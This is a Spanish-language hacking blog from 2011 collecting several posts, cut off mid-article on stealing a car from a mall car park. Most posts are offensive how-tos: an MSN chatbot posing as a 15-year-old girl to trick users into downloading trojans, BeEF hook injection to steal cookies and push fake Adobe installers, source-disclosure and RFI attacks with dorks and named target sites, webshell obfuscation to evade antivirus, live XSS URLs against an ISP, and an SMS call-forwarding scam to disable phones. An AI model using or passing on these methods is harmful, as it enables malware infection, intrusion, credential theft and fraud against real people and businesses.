Procederemos a crearnos una Cuenta en la Siguiente web y a descargar nuestra IBOX PLATAFORM

http://sp.incesoft.com

Nota: es una Plataforma para Bots [SOFTWARE] que nos permitira la configuracion total del IBOT

Un formulario comun y corriente

Una ves teniendo una cuenta nos decidimos a la Configuracion externa de nuestro BOT como lo es.. MENSAJE - AVATAR - NICK y todo... Esto lo haremos con el fin de simular un user comun y corriente.
No Daremos Pistas de que es un BOT

Para ello en la Imagen me decidi a simular una Chica Aproximadamente de 15 Años que solo busca Amigos..
Se llama Laura su pic es de una chica llamativa y cosas asi...

Actualizamos la Informacion y Guardamos

Basic Info: Informacion simple del BOT.. servidor CHINA mensajes y todo pero solo es en tu cuenta! no se vera en el BOT MSN CONTACT

Robot Account: Ahi es donde agregan sus cuentas de MSN para que vivan los bots, y las administran , pueden cambiar sus contraseñas, ver que usuarios lo agregaron, etc.

Display Pictures: Cambian las imagenes que puede tener el bot

My Emotions: Agrega emoticones personalizados

Your Files: podremos subir archivos que se le enviarian a los contactos
Nuestro caso, algun malware.

La cuenta Hotmail que Agregaran en Msn Account management debe ser REAL y que quede acorde a los datos para pasar desapersividos
si tu Nick es LAURA create un MSN masomenos asi

lau-67548-linda@hotmail.com

Eso es creible pero no haras incoherencias como:

elmejor-man@hotmail.com

Sopechoso no ¿?
Despues de este paso decidiremos hacer CONECTAR y DARLE VIDA A FRANKESTEIN XD!.. pero Primero configuraremos que Dira... que Preguntara y como Actuara!..

Ya despues de terminar la configuracion procedemos a descargar los Sources JAVA SDK, COM SDK

Configurando el interior

Una ves descargado todo tendremos que tener conocimientos en el lenguaje BASE: JAVA, como no quiero alargar este articulo no muestro esas partes.

1- Debemos tener en cuenta la conversacion: debe ser Coherente, debe tener preguntas y respuestas previas:

EJEMPLO

BoT: Hola!
user: hola
bot: como estas?
user: bien y tu?
bot: bien, quieres ver mi foto?
user: si
bot: mira: [Link malicioso]

Pues Bueno... Ahora Como Infectaremos con Algun malware ¿?
Procedemos a Subir un .EXE ya sea un Server de BOTNET o Troyano o un SHD o un SERVER PROXY o FTPSERVER lo que quieran... a algun Hosting personal o nuevo y lo metemos en medio de la conversacion del IBOT
En mi caso hice mi BOT de esta Manera...

BOT: Hola
User: Hola
BOT: como estas¿?
User: bn y tu , quien eres?
BOT: yo estoy bien.. soy Laura tengo 15 Años y busco amigos
User: mm ya
BOT: tengo fotos y una Pagina :)
BOT: mi pagina es http://www.webconmalware.com/index.php
User: Me pide que baje un Archivo¿?
BOT: ahh se me olvidaba para verla bien debes bajar el Complemento de videos
User: ahh OKz!

El Index.php de mi web tiene un REDIRECT hacia un .exe y q se autodescargue y que imprima una alerta que diga.. "Necesita Bajar el Sgte Complemento"
La persona lo baja y listo!!

Como difundir Nuestro Correo BOT¿?
muy simple, exportando listas de contactos y agregandolas al msn bot, usando mailist entre muchas mas.

Analizando todo, ya ven como convertir una simple APP en una potente herramienta de Marketing o malwaring? incluso crimeware.

Mi pc modding [|||||||||||||||87%]

2011-06-02T18:04:00.000-07:00

Mi PC Modding

------------------------

Frontal

Posed

Interno

Características:

Case Transparente

AMD PHENOM II X4 Black Edition

BOARD ASUS M4A79XTD EVO

2 x 4 DDR3 Ram

Nvidia Geforce Gtx 560ti 1024

Sound Xtremegamer Creative Sku

Fuente Real 800 W Mustiff

Iluminacion catodos y Leds UV

XSS Tunneling [BeEF]

2011-06-01T19:45:00.000-07:00

Hace mucho tiempo que Nuestro camarada MurdeR Hizo una charla sobre XSSTunneling con BeEF y los Logs se encuentran en... el Blog de CEREAL sin Alargar tanto Hoy decido Crear una introduccion a dicha herramienta que es tan Buena :D que Permite La ejecucion de Java Applet Payload + exe :O

------------------------------------------------------------------------

INICIEMOS

1- Descargamos BeEF de Su pagina oficial

http://www.bindshell.net/tools/beef/

2- Desempaquetamos.....

3-En un Hosting montamos los Archivos...Cuando acabemos vamos a la GUI

-----------------------------------------------------------------------

Una Vez Montado como saber si funka ¿?

Simple Nos Ponemos en la GUI :D

Y vamos al MENU VIEW Y ELEGIMOS LA 1 OPCION

Este Nos Brindara una ventana de EXAMPLE O PRUEBA si vemos q Al cabo de unos Segundos Conecta...

Quiere decir q Nuestro BeEF esta Listo :D!!!

---------------------------------------------------------------------

COMO USARLO¿?

Bueno vamos al menu q Nombre anteriormente VIEW/Spawn Zombie Example

Nos saldra esta pag:

Dicho codigo es un ARCHIVO SCRIPT q se encuentra en los archivos que nosotros subimos con el BEEF!

<script language='Javascript' src="http://          /beef/hook/beefmagic.js.php'></script>

Ese Code Hay q Meterlo en el Body de las Paginas.. Su funcion seria crear un Puente...Se preguntan en q Paginas¿?... en las que Quieran...!!! EJEMPLO!... si logran meter el SCRIPT CODE en alguna pagina con usuarios EJEMPLO: facebook.com XD podrias robar SESIONES COOKIES.. Ademas Podrias meterlo en varias webs FAMOSAS CON MUCHA SVISITAS y a los users los Rediriges a un EXE y asi Podrias tener un Malware Infeccion

Mentiendo el Code en un INDEX de un Hacked HOST!

Este Code Hara una Simulacion de q la web esta Cargando... y A la vez Conecta al BEEF CLIENT

En Nuestro Client BEEF Veriamos esto....

1 ZOMBIE A CONECTADO :D

Podriamos Robar Cookies

Sacar IPS

Enviar Alerts!

Java Applet!

Entr otras Funciones.....

Enviando Alerts

1- VISTA DESDE EL CLIENT MANAGER

2-VISTA DESDE LA WEB Q RECIBE

Haciendo redireccion a Archivo Exe Mediante ING SOCIAL!

1- Enviamos AlerT al usuario con algo q haga descarga

EJEMPLO: "Para Ver la Pagina Necesita tener Adobe reader 3"

El usuario dira Bueno lo Descargo de una....

2- Le hacemos un redirect a Un Archivo.exe Simulando ser el Adobe Reader 3

a- Vamos a NETWORK MODULES/ BROWSER REDIRECT

b- Ingresamos el enlace con el .exe MALICIOSO

c- Al abrirse el usuario creera q es el ADOBE q se le pidio anteriormente... y PFF

-------------------------------------------------------------------

Conociendo la vuln [Source Code Disclosure]

2011-06-01T19:30:00.000-07:00

Esta vulnerabilidad es provocada porque no descarga los archivos con seguridad, osea se fuerza a descargar x archivo, ya que x archivo puede ser cualquier archivo que se le indique via GET como lo usualmente, esto es parecido a local file include y se puede resolver de la misma manera, se le puede decir al code que descarge solo X archivo y se verifica comparando si X archivo es igual a X archivo de la peticion GET. [Definicion Yoya]

*[filedowload.php?file=file4
*[filedowload.php?file=file5 ----- Estos estan en dicho servidor Si se encuentra el directorio se podria apreciar la lista

INDEX O DIRECTORIO DEL CUAL TOMA EL ARCHIVO FILE

file 1
file 2
file 3
file 4
file 5

.............

Si no le es Secuencia seria asi

*[filedowload.php?file=documentolegislacional.pdf
y veriamos el directorio asi..[ALEATORIO]

DIR INDEX

nominadeclausura.pdf

legislacionprimera.doc

documentolegislacional.pdf

imagenposteconomica.jpg

El Directorio Nos Muestra que se descarga de manera aleaotoria y sin orden alguno...
pero si se es Secuencial o aleatoria No hay problema :D

Ya que lo que necesitamos es que descargue de su propio servidor :D. y como vemos en los 2 directorios mostrados anteriormente Son del mismo server :O

Momento De Explotar :D

Ahora A explotar este BUG "inofensivo" lo que haremos no sera descargar los archivos en dicho directorio.. Si no buscar los archivos del sistema.. ya sea login.php ... admin.php fuera de estos directorios ya ea del CMS o NUKE o sistema de gestion para sacar un poco de info de coneccion de DBS [Bases de Datos] y lograr obtener Usuarios.. hash..Claves..Number Sings Entre mas...

Para encontrar webs con dicho BUG usaremos algun d0rkde estos o la creamos

allinurl:filedownload.php

allinurl:filesource.php

allinurl:dowloadfile.php

Entre Otras.. Que Podriamos sacar con imaginacion..
Una ves Buscado en Google.. Saldrian las posibles webs vulnerables..

En mi caso encontre esta

http://www.vulnerablescd.org.au/phplib/filedownload.php?file=/elib/lib/downloaded_files/publications/pdfs/phcris_pub_8108.pdf

Despues de file= va /elib/lib/downloaded_files/publications/pdfs/phcris_pub_8108.pdf

Este es un Directorio Q no es directo es llamado por dicho code
Para probar noten q si es de la web

http://www.vulnerablescd.org/elib/lib/downloaded_files/publications/pdfs/phcris_pub_8108.pdf

Pff Salio el mismo PDF :O

Ahora ya sabemos y estamos 100% seguros Q la web descarga sus propios archivos...
Con un Poco de Imaginacion buscaremos archivos q nos boten Info.. y saber usarla

Buscaba y buscaba y no encontre nada :(

Pero.. pff Viene la Imaginacion..Debo aclarar q esta Vulnerabilidad descarga el SOURCE Completamente :O
Es decir q no es lo mismo q la Opcion Codigo de fuente...Ahora me enfocare en el index.php

Para descargarlo hacemos esto..

http://www.vulnerablescd.org.au/phplib/filedownload.php?file=/index.php

Una vez obtenido el code del Index.. procedemos a Explorar
Nada :(

pues Procedo a escanear con ACUNETIX haber si encuentro directorios q interesen..

:o encontre un directorio q dice /dios/js/index.php

Lo descargo...

http://www.vulnerablescd.org.au/phplib/filedownload.php?file=/dios/js/index.php

Lo examino.. y :O Es un Simple PHP q me vota

$USER=

$PASSWD=

$VARIABLE=

$DIR=

Mucha Info No ¿?.... Ahora Despues de obtener Los Datos Sabras q Hacer :D.. ESTO no quiere decir q el Index.php o algunos archivos no voten nada.. si no q en mi caso no me sirvio, el secreto de saber sacar info de un server es explorando directorios/ y exlorando SOURCES :P

[LA DIRECCION DE LA WEB VULNERABLE HA SIDO CAMBIADA POR SEGURIDAD LOS DATOS PROPORCIONADOS POR EL .PHP HAN SIDO RESERVADOS]

Un pequeño "Follow Me" Elegante

2011-05-31T20:06:00.000-07:00

Debido a la salida del nuevo botton de "sigueme" que lanzo twitter decido ponerle un aspecto simple, minimalista y elegante con [CSS].

Es un pequeño code que se los comparto, pueden usarlo en webs, blogs y demas. (No es nada del otro mundo)

Pueden modificarle, Tamaño, Colores y efectos, todo al Gusto.

Screenshots previa



Sigueme en Twitter
   
AQUI VA EL CODE DE SU BOTTON GENERADO POR TWITTER

[XSS] Bypassing De Filtros by Vengador de las Sombras

2011-05-30T17:13:00.000-07:00

Tema profundizado:

Primero definamos qué es el bypassing. El bypassing, para cualquier cosa, consiste en poder atravesar alguna medida de seguridad con un objetivo. En nuestro caso, la definición se amolda a "saltar un filtro". El primer tipo de filtro va a ser en los formularios en los cuales sólo te dejan escribir un número determinado de caracteres.

En los inputs, se puede colocar un parámetro el cual defina el máximo número de caracteres que se pueden escribir dentro del input, se trata de maxlength="numero". Si encontrásemos un input al estilo de:

No podríamos escribir nada interesante, puesto que únicamente tenemos espacio para escribir 5 letras.... Entonces si pensamos un poco, recordaremos cierta técnica enfocada a modificar un formulario antes de enviarse.... Sí, exacto: es hora de practicar form tampering.

Simplemente debemos de abrir alguna tool que nos permita modificar el código fuente, vamos al formulario en cuestión, y modificamos el maxlength por un número altísimo, por ejemplo:

Ahora si probamos a escribir en nuestro campo, observaremos que ya sí podemos inyectar código malicioso.

Otro filtro muy común son las magic quotes. Este filtro se ocupa de adherir una \ a las comillas que pongamos en nuestro código malicioso. Así si intentamos poner algo, "en teoría" modificaría nuestra sentencia haciéndola inservible... Pero sólo en teoría.

El primer consejo que os doy para saltar un filtro, es ver qué bloquea, y despues buscar la forma de no hacer eso que bloquea. Es decir, si no te deja poner comillas, no luches contra ello, evítalo y busca la forma de inyectar sin usar comillas. Un ejemplo sería meter el código malicioso en un .js alojado en un servidor externo, y entonces al hacer la inyección, la hacemos sin comillas:

Ya tendríamos nuestra bonito XSS explotado. Pero no siempre todo es tan fácil. Las magic quotes también pueden hacer el efecto contrario: que te impidan poner /, ya que le adhieren unas comillas. Estaríamos ante el mismo problema que antes... o incluso peor, puesto que se nos impide cerrar cualquier tipo de tag, ya que recordemos, en HTML es necesario cerrar los tags con /.

Bien, no os asusteis, recordad mi consejo: No lucheis, evitad. Pues eso, evitemos tener que cerrar tags. Tenemos que realizar una búsqueda mental de elementos que no necesiten ser cerrados. Elementos como tales no encontraremos, pero..¿ y si os dijera que se puede meter código javascript dentro de un tag ?

Sip, así es. La idea original sería la de ejecutar algún evento "on" asociado a unas sentencias en JavaScript. En nuestro caso, y como ya espuse en otro paper, vamos a proceder a crear un error, y que al producirse el error tenga como respuesta la ejecución de JavaScript. Este elemento "on" es onerror. Tendríamos que poner simplemente

onerror=Código Javascript

.

Para producir el error vamos a poner un con una ruta ficticia. Al no poder visualizar la imagen, saltará el consecuente error que ejecutará el código malicioso. Lo que traducido sería:

La cosa se puede poner más peliaguda aún, si lo que hace el filtro es impedir meter letras a la variable. Me refiero a ciertos filtros que te permiten ejecutar JavaScript, pero que dentro de la sentencia en sí no te dejan usar letras ni caracteres especiales. Para estos casos, podemos transformar nuestro código malicioso en los valores ASCII de los caracteres que lo componen, y despues incrustarlos a través de String.fromCha rCode(codigo ascii).

alert(String.fromCharCode(88,83,83));

Esto provocaría una ventanita de alert con el texto "XSS". Otra forma de saltar estos filtros es poniendo código malicioso en UNICODE, es decir, representando cada caracter con su valor Hexadecimal y añadiéndole a cada uno un % delante.

Y ya por último, otro filtro que sí que nos pone las cosas bien jodidas, la función Strip_Tags . Esta función se encarga de eliminar de una variable todo lo que esté entre < >. Ahora sí que la cosa está dificil, ¿eh?. ¿Qué os tengo dicho? No intentar atravesar, siempre evitar. Y eso haremos.

Que no podemos poner < >, pues no lo ponemos. Si recordamos a los XSS en formularios, para saltarlos había que cerrar Value y a partir de ahí inyectar... Pues ahora vamos a realizar una variante de esta técnica. Si sabemos algo de CSS, podemos recordar que se pueden poner URL en algunos elementos... Entonces si a nuestro input le hacemos esto:

Habremos conseguido inquistar una sentencia maligna dentro del tag propio de la página.

En muchos blogs te permiten usar ciertos tags permitidos, como o

y esas cosas. Ahí igualmente se podría inyectar el código malicioso al meter un

. La función Strip_tags no te deja poner tus propios tags, pero sí que te deja poner los que el webmaster haya puesto.

Importancia de la etiqueta IMG en la seguridad de un WebSite

En este pequeño artículo trataremos como dice el titulo "Importancia de la etiqueta

en la seguridad de un WebSite". Como hemos visto las etiquetas

son muy usadas en WebsSites ya sean foros o redes sociales o cualquier WebSite que permita la interacion de usuarios. Ya sea en redes sociales que no permiten comentar fotos o perfiles de miembros o foros que nos permitan responder post de otros miembros o cualquier otro tipo en la mayoria de sus casos siempre se suele usar la etiqueta

para colocar alguna imagen relacionada con lo que uno esta escribiendo o poniendo alguna foto o gif animado que queramos que los demás usuarios vean, es ahí donde esta este bug que por alguna mal filtrado de las etiquetas

que en ves de poner algo normal como seria

estos nos permirita
que ala hora que la web trate de ejecutar lo que hay dentro de la etiqueta

nos ejecute la url modificada que no es una URL que contenga una imagen si no a sido manipulada para ser que nosotros queramos hacer esto nos permiten ejecutar algún tipo de código malicioso o poder hacer algún XSRF estos tipos de código los clasifico en dos tipos uno que usa URLs externas y otro que usas URLs del mismo sitio.

Ejemplos:
URL Externa

No solo se puede hacer cargar archivos php si no también cualquier tipo de archivos web que
soporte la web del atacante ya queda a imaginas del atacante el código que pueda colocar en estos archivos.

URL Interna

En este caso estamos usándolo para hacer un XSRF a la web la url puesta dentro la etiqueta

puede variar según lo que nosotros queramos que el usuario ejecute en este caso le cerrara la sesión sin que este se de cuenta de que el XSRF se ejecuto.

Medidas
Es importante tener un bueno filtrado en la etiqueta

asiendo que solo nos acepte URL con extinción gif, jpf, bmp, etc.
O desactivar la etiqueta

y sustituirlo pro un uploas que tengo un buen sistema de filtrado de archivos de imaganes.

[Articulo creado con recopilatorios de informacion, el codigo expuesto pueda no ser ejecutado debido a interpretacion de resaltador.]

Metodos alternativos para Accesar a un servidor

2011-05-29T20:25:00.000-07:00

Bueno Me eh dado cuenta q Hay casos en el q van a Ingresar a un servidor web o algo y se disponen a testear De manera Manual...

SQL
RFI
LFI
BYPASS
DIR
PATH
XSS

Entre otras Vulnerabilidades mas... Pff No logran nada !Es muy Segura! :/

Se van al Acunetix, SSS, w3AF, Intellitamper entre otros Scanner mas.. y se dedican a hacerle un Scan Completo haber si le sacan un Exploit.. y Runnearle algo :/ Nada Todo Es Seguro :(

Pues Bueno Ahora Pensaremos En ALTERNATIVAS

-SCAN DE PUERTOS Y SERVICIOS Q CORREN

-RV DNS y SCAN LOCAL A CADA WEB <-- Alguna Web Debe Ser Vulnerable!!

-RECONOCIMIENTO DE SERVER CORRIDO

-VULNERABILIDAD EN DEPENDENCIAS

Primero Usaremos un Scan de Puertos e Identificacion de Servicios

Nos decidimos a ir Sacarle la Direccion IP
-Puedes usar ShowIP [ADDON FIREFOX] = lo veran en tiempo real y Directo

-Puedes usar Comando PING para sacarlo mediante Consola

Una Ves Sacada la IP Nos dedicamos a Scannear puertos Con NMAP o NMAP ONLINE

NMAP LOCAL

Me baso en el Local para No extenderlo mas..

/*nmap 216.52.186.158

Dicho Comando nos dara PORT STATE SERVICE

NMAP ONLINE http://nmap-online.com/

Pekeña Muestra del Online

De Hay Vamos Sacando Argumentos hasta Sacar un resultado
Como Nos damos Cuenta Solo hay 1 Solo Puerto Abierto! :/
el 80 HTTP Por si Acaso Probaremos Todo..

Iremos alguna Db-Exploits Y sacaremos algun EXPLOIT para dicho Puerto / Service

/*
www.exploit-db.com
www.1337day.com

En Port Seleccionamos Nuestro Objetivo [80]

En ese tiempo cuando existia Milw0rm :( * Nostalgia *

UFFF Demasiados Exploits... Bueno hay Queda Nuestra Imaginacion Y LECTURA para saber de q manera los Podemos Usar! y Si Dicha Web Puede Ser Vulnerable

[ESTE METODO DE EXPLOIT/PORT NOS SIRVE DE ALTERNATIVA]

Ahora A Tratar de entrar Al Server Mediante REV-DNS

Este Metodo para Mi Es uno Muy Eficaz ya q la mayoria de los servidores abarcan varias webs y varios tipos de programacion y Alguna podria ser Vulnerable!

En que Consiste¿?
Consiste en Sacar todas las webs Q estan en un mismo servidor ya sea la de PEPSI.. Quiero sacar las webs q estan Junto a ella en Modo server

Como Ponerlo a Prueba¿?
Simple usaremos un Servicio WEB o alguna tool que se programen para este objetivo!

http://reversedns.undersecurity.net/

Le Damos en ENVIAR y esperamos a Que nos Liste Las webs q Estan en el mismo servidor de PEPSI.com

Una Ves Cargada la lista Podemos Descargarla en .TXT o verla ON

Bueno Ahora q haremos Con esas Webs ¿?

Simple Son varias web y estoy SEGUROOO!!! q alguna de ellas es Vulnerable a AlgO!!
ya sea XSS SQL etC!

Te preguntas que Hare explotando una web en su server si la q quiero es PEPSI.cOM ¿?

Muy Simple No defacearas la web q sea vulnerable Lo q Haras sera Meterle Shell y Escalar Directorios.. la Otra es Rootear El ADMIN GOD para listar todos Sus Webs Alojadas e ingresar a Nuestro Objetivo!!

No entiendes ¿?
Te doy un Ejemplo!!
Las webs q estan en el mismo server de pepsi son:

www.pepsi.com
pepsi.com
pepsiusa.com
www.pepsiusa.com
dewgreenlabel.com
www.thereggiebushproject.com  <----VULNERABLE RFI
thereggiebushmix.com
pepsiholidaypacks.com
pepsistreetmotion.com
dietpepsiboxoffice.com
pepsicolastore.com <---------- VULNERABLE A BYPASSER
www.pepsifirsttaste.com
www.pepsibilliondollarchallenge.com
www.billiondollarchallenge.com
mountaindewstore.com
pepsidiet.com
dippedone.com
www.pepsilight.com

Una vez testeado todas las webs.. el resultado es q tengo 2 Webs vulnerables

Una a RFI

www.thereggiebushproject.com  <----VULNERABLE RFI

Otra a BYPASSER DE UPLOADERS

pepsicolastore.com ;---------- VULNERABLE A BYPASSER

Bueno lo q Hare es mediante el RFI subir mi Shell

|||||||||||||||| 90%

Cuando Mi Shell este Adentro Nos dedicamos a Escalar Directorios...Hasta llegar al principal..

www.pepsi.com
www.blabla.com
www.afjasg.com
www.ghafjgasa.org

Si logramos llegar Al principal Q Procederemos a Hacer¿?
Ingresar a la Carpeta de Nuestro Objetivo y hacer Lo DESEADO :P

Como es lo Comun!!! Es Muy Probable q no puedas Escalar Directorios Para ello Hay q Proceder a ROOTEAR un ADMIN GOD... Eso Se Deja para el Proximo Tuto o Texto!!

Reconocimiento de Server corrido
Este metodo Nos sirve para un reconocimiento de server
Lo haremos de Manera Web Sniffer http://web-sniffer.net/

Status: HTTP/1.1 200 OK
Date: Sun, 14 Mar 2010 19:20:40 GMT 
Server: Apache 
Set-Cookie: PHPSESSID=fa1fd3d9039b908d6dd47592cee0e9b6; path=/ 
Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
Pragma: no-cache 
Content-Length: 3541 
Connection: close 
Content-Type: text/html

Ahora usaremos El metodo de Addons :P
Usaremos Server SPY
Este Addon de Firefox Muestra en la Barra que server corre

Para q Nos sirve El Server¿?
Logico para testear mas a Fondo y saber Sobre exploits y vulnerabilidades q Podamos Runnearles :D

VULNERABILIDAD EN DEPENDENCIAS

Muy poco usado y poco Conocido.. pero sirve en ocasiones
consiste en ver las dependencias de cada web e investigar un poco de ellas y tratar de encontrarle Bugs..

Ejemplos:

flash

Adobe

java

ETC!...

Como veremos las Dependencias ¿?
Simple! con el Addon VIEW DEPENDENCIES q esta en los addons destacados de Firefox

Imagen de Web Oficial

Una Ves obtenido las Dependencias Se procede a Investigar Y leer sobre ellas

Ofuscando [Sources] Webshell

2011-05-29T20:07:00.000-07:00

Puesto que la Guia [NO ES MIA] yo tratare de INTERPRETARLA a mi modo ya que la original esta OBSOLETA, para que Puedan usar Shells Indetectables..+ Un salteo de Antivirus.

Bueno Como Muchos Saben los AVS solo hacen Comparacion de Firmas y hashes para Detectar un Code Malicioso..para ello nos bastara con probar Subir nuestra Shell a [NovirusThanks] y comprobar Su Nivel de Indetectabilidad O detectabilidad

Primero Buscaremos Una Shell Si no la Tenemos.. Aca les dejo la Mia

[PERDON POR PONERLA EN UNA WEB APARTE ES QUE LA SHELL ERA MUY EXTENSA EN CODIGO Y [CODE] NO LA COGIA BIEN]

http://paste2.org/p/647926

Segundo la Guardamos como Shell.php y la subimos a NovirusthanKs y seleccionamos la Opcion de "Do not distribute the sample" y Damos en SubmIT..Demoraria unos Min Y la Dependencia de Tu conexion..

Despues de Obtener el reporte Veremos Cuantos AVS la Detectan..

Como Podemos ver es detectado 13/21 ... Muchos :O..Bueno ahora Llegaremos al Servicion Online de OFUSCACION CODE-ECLIPSE y pegamos Nuestro Code De Shell en el Recuadro y Le damos en el boton [NEXT]

Eligen la Opcion [Nombre de shell] Buff prepare

Luego Encodeamos y damos Finish y Esperamos a Que nos Bote Nuestro Code Ofuscado!!

Ps ya tenemos Nuestro Code Ofuscado Y luego de copiarlo y guardar Procedemos a Subirlo al Novirusthanks Haber Que Nivel De Indetectabilidad tiene Ahora...

Bn Como ya vemos Nuestra Shell Ahora es Detectada Solo Por 2 AVS.Bueno Ahora Si Queremos Indetectarla mas Lo Unico q nos Tocaes Editar el Source para Ir Burlando hashes...SE NECESITA CONOCIMIENTO DE PROGRAMADOR

Visualizar [LINKS] ocultos en foros

2011-05-29T19:41:00.001-07:00

Pues Este Articulo lo hago por q veo q hay users q preguntan mucho sobre esto... en el caso de Nuestro compañero R00tMan Q ha Buscado info en foros y no lo dejan ver por Links Ocultos...

Estas Curiosidades de ver Links Ocultos es algo LECHER ya q Aprovecharemos un recurso de la web Sin registrarse ni dar gracias ni Aportar!!

hay varios Metodos.. MurdeR Dio uno y es el de RSS.. algo Antiguo pero no lo Aporto ya q Es un Complique Buscar El RSS de una web, si esta no la tiene al publico!..

Para ello Aportare Metodos SIMPLES - BASICOS - 80% FuNCIONALES

METODOS

1- El Primero es Simple.. Es la Burla hacia el sistema de FORO.. mediante los AGENTES para hacerle creer q Somos BOTS recopilatorios... en mi caso usaremos el..

ADDON: User Agent SwitCher
A- Voy en la red googleando y encuentro un foro con una info y PFF me vota lo SGTE:

Que mal :( No podre ver la Info me da WEVA registrarme :(

B- Nos vamos a HERRAMIENTAS/DEFAULT USER AGENT/SEARCH BOT/

Nos Salen varias Opciones..

GOOGLEBOT

MSN BOT

YAHOO BOT

Intentaremos Con cada una...

Pff Oprimo en el GOOGLEBOT y le doy F5 a la pagina De repente me sale la Info como si estuviera REGISTRADO y Saco la Info q Tanto Buscaba :D FACIL NO¿?

2- No Muchas Webs te daran paso como el caso Anterior.. para ello Hay Otro metodo

Herramientas: GraseyMonkey

Una Vez instalada en firefox.. procedemos a Buscar nuestro SCRIPT

http://userscripts.org/scripts/show/23074

Lo Instalamos... Q hace dicho script¿?
Este script es una WEB con una Base Muy grande de USERS/PASSWD q te permite accesar a webs de manera rapida sin registros.. es como si un amigo te prestara su cuenta

Modo de uso

A- vamos a la web q deseamos entrar

Ejemplo: taringa.com

Al tratar de Loguear Sale la Opcion del Script "BUSCAR UN USUARIO PARA ESTE SITIO"

Elegimos la Opcion "BUSCAR UN USUARIO PARA ESTE SITIO"

http://i44.tinypic.com/35lyrnr.jpg

Como vemos el Script Nos Busco un user e ingresamos a la web sin registro Alguno :P

NOTA: Dicho Script Aveces no suele Funcionar Por la Simple cuestion de q en la web del script TODO EL MUNDO APORTA CUENTAS y algunas estan ERRADAS como malgunas Funkan de manera Excelente!

3- Otro Script Para GreasyMonkey q APorto el user "SQLERROR".. Este Script es Bueno pero No Muy Funcional ya q No es un 40% Servible de paso les muestro..

CON SCRIPT PUDE VISUALIZAR EL LINK OCULTO :D

4- el metodo es simple.. Pones la URL en Google.. y te saldra Solo 1 resultado.. le das VER EN CACHE y Listo :P

Bueno Este Articulo No lo Hago Para Animar a Q Sean LECHERS.. Si No q Cuando esten En Apuros y Sea Necesario No Pierdan tanto Tiempo en Un registro

Estos Metodos son un 80% Aprobados.. Si Alguien Aporta Mas Le hago edit Al Articulo Con El Credito del Aporte!

VTR - Banda Ancha Para Todos [BUGS = Q TELEFONICA]

2011-05-29T19:34:00.000-07:00

Pues hablando con un Compañero DARCK Me mostro la web de internet banda ancha... pues q Raro q Estos Dias Andan en frente Mio proveedores con XSS ajaja Una Vuln Tan Baja -.-!!

https://wsc.vtr.net/proveedores/main.asp?mensaje=%3Ch1%3EOWNED%3C/h1%3E

https://wsc.vtr.net/proveedores/main.asp?mensaje=%3Cmarquee%3E%3Ch1%3ETEST-XSS%3C/h1%3E%3C/marquee%3E

Un Ataque que podria dejar sin servicios de telefonia movil en toda una ciudad!!

2011-05-29T18:07:00.000-07:00

Pues En mi Rato Libre Me puse a Realizar una Investigacion en celulares Analogicos y Modernos.... Probando con Cmands Sticks y Me Acorde De algo!

Se Acuerdan De los 2 Famosos Commands!!!

**21*numerodestinatario# [SEND]
*##21# [SEND]

Si no se acuerdan.. estos son DESVIOS DE LLAMADAS

Pero Se preguntaran Porque esta Huevada Se esta Posteando? Es mas Viejo Que mis Cojones!!

Aqui va la Respuesta...

Que tal Si Coges un SPAMMER CEL y Haces Los Siguiente..

|--------------------------------------------------------|
| Cel: 301-xxx-xxxx
|      301-xxx-xxxx
|      301-xxx-xxxx
|      301-xxx-xxxx
|      301-xxx-xxxx
|   Con Mas numeros..
|
|Mensaje: Su Operador le informa que hay una Actualizacion
|Para Solicitarla Oprima lo Siguiente: **21*10101010#  seguido
| de
|la tecla Send....
----------------------------------------------------------

NOTA: **21*10101010# Donde se encuentra el Numero 10101010 deberia ir un Desvio con Numero Activo pero si este esta OFF o No existe Crearia un Error De llamada o Numero Errado.

Que Pasaria?

Lo Intente con 5 Numeros Familiares.. y con los Cels a la mano..

al Momento de llamarles, Este No Permitian llamadas entrantes..

GRABACION: NUMERO ERRADO!

Aja y Eso que.. Como Podria Joder a Toda una Ciudad.. Que Tonteria!

Las Bases Con los Numeros Celulares de Ciertos Operadores.. las consigues Por hay... con el objetivo de hacer Marketing, que tal si compramos unas pero sin tal objetivo?

1 Base Tiene Aprox 2 Millones de numeros Que Al Crear un "Spammer cel" con soporte de cierta cantidad, Se podria Saturar Miles y Miles de Lineas Moviles...

Poniendolo A Prueba!

1- Conecte mi cel y Transferi Los Directrios y Grupos Telefonicos a un TXT

2- Cogi el Spammer de un Amigo.. y Enviamos el mensaje a 50 Numeros

3- Al Intentar llamar a alguno de estos

GRABACION: NUMERO ERRADO!

Al testear un rato mas Me doy cuenta.. Que en Todos Los Modelos No sirve este!!
Solo Algunos De ellos!!!

Por eso No es un 100 % COMPROBADO! ya que no tengo Miles de Celulares XD!
Pero si un 90 % Funcional!

CONCLUSION: Un Operador Movil Podria Quebrar o Decaer Con Este Fallo En Ciertos Celulares Incluso!.. La dificil SOLUCION ya que la manera de Arreglar Seria Enviando un MENSAJE con el Discado Que lo soluciona...

SOLUCION DEL FALLO:

##21# [SEND]

Pocas Palabras...

Este Tipo de Ataques Puede Ser fatal para los Usuarios con celulares Algo Antiguos Incluso Celulares nuevos que admiten la Reprogramacion De Sticks o KeyTicks... Esto Podria Afectar Demasiado a los Locales de Llamadas.. Que Usan Generalmente este tipo de Celulares... GENRARIA UNA GRAN DECAIDA DE $$$...

Como Robar un Auto? Mejor, como tomar prestado un auto?

2011-05-29T17:03:00.001-07:00

De Esto....

A esto....

Exagerándonos un poco Con el Auto XD!

Nota Clarísima: Este Articulo No esta Orientado Para Robar, mas Bien Se explica el mecanismo de obtener un Automóvil de un centro comercial debido a fallas de seguridad en Su red.

Contenido

1- Centros Comerciales y Parqueaderos
2- Sistema de Seguridad de parqueaderos organizados
3- Como trabaja un Sistema de Seguridad en parqueaderos organizados
4- Donde esta la falla
5- Como Aprovechar la Falla
6- Saliendo Desapercibidos

Centros Comerciales y Parqueaderos

Bueno esta demas decir que los parqueaderos de los centros comerciales usualmente son grandisimos y categorizados como los clasicos juegos de "Astucia naval"

Ejemplo: A1- A2- A3 -B1 -B2 -B3 ... etc.

Pero Estuve Observando Que estos tratan de Organizarse cada vez mas para que el usuario no tenga que ir Caminando Todo el parqueadero En busca de su Auto.

Sistema de Seguridad de parqueaderos Organizados

Pero De que Manera Se organizan? teletransportacion hasta el usuario? XD.. nahh Pss Observando Note Que al ingresar al parqueadero Se te Asigna un CARNET Con Un ID DIGITADO QUe identifica al Automovil.

Este Sistema Trabaja de la Siguiente Manera...

